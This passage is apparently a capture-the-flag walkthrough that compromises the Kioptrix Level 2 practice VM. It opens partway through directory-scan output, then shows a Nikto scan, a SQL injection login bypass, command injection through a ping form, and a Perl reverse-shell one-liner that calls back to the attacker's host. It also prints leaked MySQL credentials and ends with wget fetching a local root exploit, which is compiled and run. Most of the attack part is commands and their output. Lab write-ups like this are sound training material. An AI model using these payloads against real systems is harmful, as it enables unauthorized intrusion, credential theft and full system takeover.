+ http://192.168.180.138/manual/fr/faq/index.html (CODE:200|SIZE:3564)         
                                                                               
---- Entering directory: http://192.168.180.138/manual/fr/howto/ ----
+ http://192.168.180.138/manual/fr/howto/index.html (CODE:200|SIZE:5685)       
                                                                               
---- Entering directory: http://192.168.180.138/manual/fr/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.138/manual/fr/misc/ ----
+ http://192.168.180.138/manual/fr/misc/index.html (CODE:200|SIZE:5491)        
                                                                               
---- Entering directory: http://192.168.180.138/manual/fr/mod/ ----
+ http://192.168.180.138/manual/fr/mod/index.html (CODE:200|SIZE:13437)        
                                                                               
---- Entering directory: http://192.168.180.138/manual/fr/programs/ ----
+ http://192.168.180.138/manual/fr/programs/index.html (CODE:200|SIZE:4664)    
                                                                               
---- Entering directory: http://192.168.180.138/manual/fr/ssl/ ----
+ http://192.168.180.138/manual/fr/ssl/index.html (CODE:200|SIZE:3988)         
                                                                               
---- Entering directory: http://192.168.180.138/manual/fr/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.138/manual/ja/developer/ ----
+ http://192.168.180.138/manual/ja/developer/index.html (CODE:200|SIZE:4770)   
                                                                               
---- Entering directory: http://192.168.180.138/manual/ja/faq/ ----
+ http://192.168.180.138/manual/ja/faq/index.html (CODE:200|SIZE:3564)         
                                                                               
---- Entering directory: http://192.168.180.138/manual/ja/howto/ ----
+ http://192.168.180.138/manual/ja/howto/index.html (CODE:200|SIZE:5607)       
                                                                               
---- Entering directory: http://192.168.180.138/manual/ja/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.138/manual/ja/misc/ ----
+ http://192.168.180.138/manual/ja/misc/index.html (CODE:200|SIZE:5491)        
                                                                               
---- Entering directory: http://192.168.180.138/manual/ja/mod/ ----
+ http://192.168.180.138/manual/ja/mod/index.html (CODE:200|SIZE:13298)        
                                                                               
---- Entering directory: http://192.168.180.138/manual/ja/programs/ ----
+ http://192.168.180.138/manual/ja/programs/index.html (CODE:200|SIZE:4664)    
                                                                               
---- Entering directory: http://192.168.180.138/manual/ja/ssl/ ----
+ http://192.168.180.138/manual/ja/ssl/index.html (CODE:200|SIZE:3957)         
                                                                               
---- Entering directory: http://192.168.180.138/manual/ja/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.138/manual/ko/developer/ ----
+ http://192.168.180.138/manual/ko/developer/index.html (CODE:200|SIZE:4770)   
                                                                               
---- Entering directory: http://192.168.180.138/manual/ko/faq/ ----
+ http://192.168.180.138/manual/ko/faq/index.html (CODE:200|SIZE:3371)         
                                                                               
---- Entering directory: http://192.168.180.138/manual/ko/howto/ ----
+ http://192.168.180.138/manual/ko/howto/index.html (CODE:200|SIZE:5299)       
                                                                               
---- Entering directory: http://192.168.180.138/manual/ko/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.138/manual/ko/misc/ ----
+ http://192.168.180.138/manual/ko/misc/index.html (CODE:200|SIZE:5491)        
                                                                               
---- Entering directory: http://192.168.180.138/manual/ko/mod/ ----
+ http://192.168.180.138/manual/ko/mod/index.html (CODE:200|SIZE:12795)        
                                                                               
---- Entering directory: http://192.168.180.138/manual/ko/programs/ ----
+ http://192.168.180.138/manual/ko/programs/index.html (CODE:200|SIZE:4543)    
                                                                               
---- Entering directory: http://192.168.180.138/manual/ko/ssl/ ----
+ http://192.168.180.138/manual/ko/ssl/index.html (CODE:200|SIZE:3988)         
                                                                               
---- Entering directory: http://192.168.180.138/manual/ko/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.138/manual/ru/developer/ ----
+ http://192.168.180.138/manual/ru/developer/index.html (CODE:200|SIZE:4770)   
                                                                               
---- Entering directory: http://192.168.180.138/manual/ru/faq/ ----
+ http://192.168.180.138/manual/ru/faq/index.html (CODE:200|SIZE:3564)         
                                                                               
---- Entering directory: http://192.168.180.138/manual/ru/howto/ ----
+ http://192.168.180.138/manual/ru/howto/index.html (CODE:200|SIZE:5685)       
                                                                               
---- Entering directory: http://192.168.180.138/manual/ru/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.138/manual/ru/misc/ ----
+ http://192.168.180.138/manual/ru/misc/index.html (CODE:200|SIZE:5491)        
                                                                               
---- Entering directory: http://192.168.180.138/manual/ru/mod/ ----
+ http://192.168.180.138/manual/ru/mod/index.html (CODE:200|SIZE:13437)        
                                                                               
---- Entering directory: http://192.168.180.138/manual/ru/programs/ ----
+ http://192.168.180.138/manual/ru/programs/index.html (CODE:200|SIZE:5016)    
                                                                               
---- Entering directory: http://192.168.180.138/manual/ru/ssl/ ----
+ http://192.168.180.138/manual/ru/ssl/index.html (CODE:200|SIZE:3988)         
                                                                               
---- Entering directory: http://192.168.180.138/manual/ru/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Tue Aug  9 02:13:55 2016
DOWNLOADED: 262884 - FOUND: 102


nikto -h 192.168.180.138
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.180.138
+ Target Hostname:    192.168.180.138
+ Target Port:        80
+ Start Time:         2016-08-09 02:15:09 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.0.52 (CentOS)
+ Retrieved x-powered-by header: PHP/4.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Server leaks inodes via ETags, header found with file /manual/, fields: 0x5770d 0x1c42 0xac5f9a00;5770b 0x206 0x84f07cc0 
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8346 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time:           2016-08-09 02:15:36 (GMT-4) (27 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

In the HTML body we see that the admin user is Administator.
html>
<body>
<form method="post" name="frmLogin" id="frmLogin" action="index.php">
<table width="300" border="1" align="center" cellpadding="2" cellspacing="2">
<tr>
<td colspan='2' align='center'>
<b>Remote System Administration Login</b>
</td>
</tr>
<tr>
<td width="150">Username</td>
<td><input name="uname" type="text"></td>
</tr>
<tr>
<td width="150">Password</td>
<td>
<input name="psw" type="password">
</td>
</tr>
<tr>
<td colspan="2" align="center">
<input type="submit" name="btnLogin" value="Login">
</td>
</tr>
</table>
</form>

<!-- Start of HTML when logged in as Administator -->
</body>
</html>

Let us inject with the following user and password:
Administrator
' OR '1'='1

We have a pannel that allows us to ping. Let us try this:
ping 127.0.0.1&whoami
Output:
apache

One more test:
ping 127.0.0.1&perl -v

This is perl, v5.8.5 built for i386-linux-thread-multi

Copyright 1987-2004, Larry Wall

Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5 source kit.

Complete documentation for Perl, including FAQ lists, should be found on
this system using `man perl' or `perldoc perl'.  If you have access to the
Internet, point your browser at http://www.perl.com/, the Perl Home Page.

Great! Let's get a shell:
ping 127.0.0.1&perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.180.132:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

On our end:
 nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.180.132] from (UNKNOWN) [192.168.180.138] 32770
whoami
apache
ls
index.php
pingit.php
uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

<?php
mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());
//print "Connected to MySQL<br />";
mysql_select_db("webapp");


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
john:x:500:500::/home/john:/bin/bash
harold:x:501:501::/home/harold:/bin/bash

ps -aux
USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.4  3588  548 ?        S    Aug08   0:00 init [3]                                   
root         2  0.0  0.0     0    0 ?        SN   Aug08   0:00 [ksoftirqd/0]
root         3  0.0  0.0     0    0 ?        S<   Aug08   0:00 [events/0]
root         4  0.0  0.0     0    0 ?        S<   Aug08   0:00 [khelper]
root         5  0.0  0.0     0    0 ?        S<   Aug08   0:00 [kacpid]
root        82  0.0  0.0     0    0 ?        S<   Aug08   0:00 [kblockd/0]
root        83  0.0  0.0     0    0 ?        S    Aug08   0:00 [khubd]
root       100  0.0  0.0     0    0 ?        S    Aug08   0:00 [pdflush]
root       101  0.0  0.0     0    0 ?        S    Aug08   0:00 [pdflush]
root       102  0.0  0.0     0    0 ?        S    Aug08   0:00 [kswapd0]
root       103  0.0  0.0     0    0 ?        S<   Aug08   0:00 [aio/0]
root       249  0.0  0.0     0    0 ?        S    Aug08   0:00 [kseriod]
root       482  0.0  0.0     0    0 ?        S<   Aug08   0:00 [ata/0]
root       483  0.0  0.0     0    0 ?        S<   Aug08   0:00 [ata_aux]
root       498  0.0  0.0     0    0 ?        S    Aug08   0:00 [kjournald]
root      1745  0.0  0.3  3120  440 ?        S<s  Aug08   0:00 udevd
root      1785  0.0  0.0     0    0 ?        S    Aug08   0:00 [shpchpd_event]
root      1862  0.0  0.0     0    0 ?        S<   Aug08   0:00 [kauditd]
root      1974  0.0  0.0     0    0 ?        S    Aug08   0:00 [kjournald]
root      2692  0.0  0.5  2432  680 ?        Ss   Aug08   0:00 /sbin/dhclient -1 -q -lf /var/lib/dhcp/dhclient-eth0.leases -pf /var/run/dhclient-eth0.pid eth0
root      2731  0.0  0.4  2196  540 ?        Ss   Aug08   0:00 syslogd -m 0
root      2735  0.0  0.3  1536  384 ?        Ss   Aug08   0:00 klogd -x
rpc       2762  0.0  0.4  2424  600 ?        Ss   Aug08   0:00 portmap
rpcuser   2781  0.0  0.6  3772  852 ?        Ss   Aug08   0:00 rpc.statd
root      2807  0.0  0.2  5504  368 ?        Ss   Aug08   0:00 rpc.idmapd
root      2880  0.0  0.3  3400  444 ?        Ss   Aug08   0:00 /usr/sbin/acpid
root      2964  0.0  0.9  5432 1140 ?        Ss   Aug08   0:00 /usr/sbin/sshd
root      2977  0.0  0.6  3352  768 ?        Ss   Aug08   0:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
root      2995  0.0  1.6  8436 2044 ?        Ss   Aug08   0:00 sendmail: accepting connections
smmsp     3004  0.0  1.2  6932 1632 ?        Ss   Aug08   0:00 sendmail: Queue runner@01:00:00 for /var/spool/clientmqueue
root      3014  0.0  0.2  2936  352 ?        Ss   Aug08   0:00 gpm -m /dev/input/mice -t imps2
root      3023  0.0  0.7  6184  936 ?        Ss   Aug08   0:00 crond
xfs       3044  0.0  1.0  3940 1300 ?        Ss   Aug08   0:00 xfs -droppriv -daemon
root      3061  0.0  0.3  3128  428 ?        Ss   Aug08   0:00 /usr/sbin/atd
dbus      3070  0.0  0.6  2604  804 ?        Ss   Aug08   0:00 dbus-daemon-1 --system
root      3079  0.0  4.5  8808 5772 ?        Ss   Aug08   0:00 hald
root      3399  0.0  0.5  3328  680 ?        Ss   Aug08   0:00 dhclient
root      3401  0.0  8.1 22088 10272 ?       Ss   Aug08   0:00 httpd
root      3427  0.0  0.9  4460 1236 ?        S    Aug08   0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --socket=/var/lib/mysql/mysql.sock --err-log=/var/log/mysqld.log --pid-file=/var/run/mysqld/mysqld.pid
mysql     3469  0.0 14.8 127236 18736 ?      Sl   Aug08   0:00 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --socket=/var/lib/mysql/mysql.sock
root      3499  0.0  0.3  3124  388 tty1     Ss+  Aug08   0:00 /sbin/mingetty tty1
root      3500  0.0  0.3  3300  384 tty2     Ss+  Aug08   0:00 /sbin/mingetty tty2
root      3501  0.0  0.3  3460  388 tty3     Ss+  Aug08   0:00 /sbin/mingetty tty3
root      3502  0.0  0.3  3444  388 tty4     Ss+  Aug08   0:00 /sbin/mingetty tty4
root      3503  0.0  0.3  2928  384 tty5     Ss+  Aug08   0:00 /sbin/mingetty tty5
root      3504  0.0  0.3  2964  388 tty6     Ss+  Aug08   0:00 /sbin/mingetty tty6
root      4973  0.0  1.7  9564 2256 ?        SNs  Aug08   0:00 cupsd
apache    5112  0.0  4.7 22088 5976 ?        S    Aug08   0:00 httpd
apache    5113  0.0  4.7 22088 5976 ?        S    Aug08   0:00 httpd
apache    5114  0.0  4.7 22088 5976 ?        S    Aug08   0:00 httpd
apache    5115  0.0  4.7 22088 5976 ?        S    Aug08   0:00 httpd
apache    5116  0.0  4.7 22088 5976 ?        S    Aug08   0:00 httpd
apache    5117  0.0  4.7 22088 5976 ?        S    Aug08   0:00 httpd
apache    5118  0.0  4.7 22088 5976 ?        S    Aug08   0:00 httpd
apache    5119  0.0  4.7 22088 5976 ?        S    Aug08   0:00 httpd
apache   10408  0.0  2.3  7560 3020 ?        S    00:01   0:00 perl -MIO -e $p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.180.132:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;
apache   10482  0.0  0.6  3600  796 ?        R    00:05   0:00 ps -aux


cat /etc/issue

Welcome to Kioptrix Level 2 Penetration and Assessment Environment

--The object of this game:
|_Acquire "root" access to this machine.

There are many ways this can be done, try and find more then one way to
appreciate this exercise.

DISCLAIMER: Kioptrix is not resposible for any damage or instability
caused by running, installing or using this VM image.
Use at your own risk.

WARNING: This is a vulnerable system, DO NOT run this OS in a production
environment. Nor should you give this system access to the outside world
(the Internet - or Interwebs..)

Good luck and have fun!

Ok, nice info let's exploit:


wget -P /tmp/ http://192.168.180.132/9542.c
gcc /tmp/9542.c -o /tmp/9542
bash -i

exec /tmp/9542
whoami
root

Game over.

Best Regards,
Yuriy Stacnhev/URIX